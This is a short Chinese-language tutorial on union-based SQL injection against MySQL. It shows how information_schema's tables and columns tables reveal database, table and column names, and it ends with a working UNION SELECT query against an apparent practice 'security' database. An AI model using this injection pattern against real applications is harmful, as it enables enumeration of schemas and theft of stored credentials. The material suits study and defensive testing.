在学习SQL注入时, 经常拿出来的例子就是PHP+MySQL这一套经典组合. 其中又经常提到的>=5.0版本的MySQL的内置库: information_schema
简单看一下information_schema库中的内容
其中在注入时关注的两张表: tables 和 columns
mysql> use information_schema Database changed mysql> show tables; +---------------------------------------+ | Tables_in_information_schema | +---------------------------------------+ | CHARACTER_SETS | | COLLATIONS | | COLLATION_CHARACTER_SET_APPLICABILITY | | COLUMNS | | COLUMN_PRIVILEGES | | ENGINES | | EVENTS | | FILES | | GLOBAL_STATUS | | GLOBAL_VARIABLES | | KEY_COLUMN_USAGE | | PARAMETERS | | PARTITIONS | | PLUGINS | | PROCESSLIST | | PROFILING | | REFERENTIAL_CONSTRAINTS | | ROUTINES | | SCHEMATA | | SCHEMA_PRIVILEGES | | SESSION_STATUS | | SESSION_VARIABLES | | STATISTICS | | TABLES | | TABLESPACES | | TABLE_CONSTRAINTS | | TABLE_PRIVILEGES | | TRIGGERS | | USER_PRIVILEGES | | VIEWS | | INNODB_BUFFER_PAGE | | INNODB_TRX | | INNODB_BUFFER_POOL_STATS | | INNODB_LOCK_WAITS | | INNODB_CMPMEM | | INNODB_CMP | | INNODB_LOCKS | | INNODB_CMPMEM_RESET | | INNODB_CMP_RESET | | INNODB_BUFFER_PAGE_LRU | +---------------------------------------+ 40 rows in set (0.00 sec)
其中tables表中保存的是库和表名的对应信息, 分别是table_schema, table_name.
通过select table_schema, table_name from tables, 可以查询整个MySQL下所有的库名和表名的对应信息. 注意是全部的, 查询指定库的话, 使用where条件指定即可
mysql> select table_schema, table_name from tables where table_schema='security'; +--------------+------------+ | table_schema | table_name | +--------------+------------+ | security | emails | | security | referers | | security | uagents | | security | users | +--------------+------------+ 4 rows in set (0.00 sec)
另一张表columns, 里面是有三个字段的, table_schema, table_name, column_name
mysql> select table_schema, table_name, column_name from columns where table_schema='security' and table_name='users'; +--------------+------------+-------------+ | table_schema | table_name | column_name | +--------------+------------+-------------+ | security | users | id | | security | users | username | | security | users | password | +--------------+------------+-------------+ 3 rows in set (0.01 sec)
带入到联合查询中的写法
mysql> select id, username, password from users where id = 1 union select table_schema, table_name, column_name from information_schema.columns where table_schema=database() and table_name='users'; +----------+----------+----------+ | id | username | password | +----------+----------+----------+ | 1 | Dumb | Dumb | | security | users | id | | security | users | username | | security | users | password | +----------+----------+----------+ 4 rows in set (0.00 sec)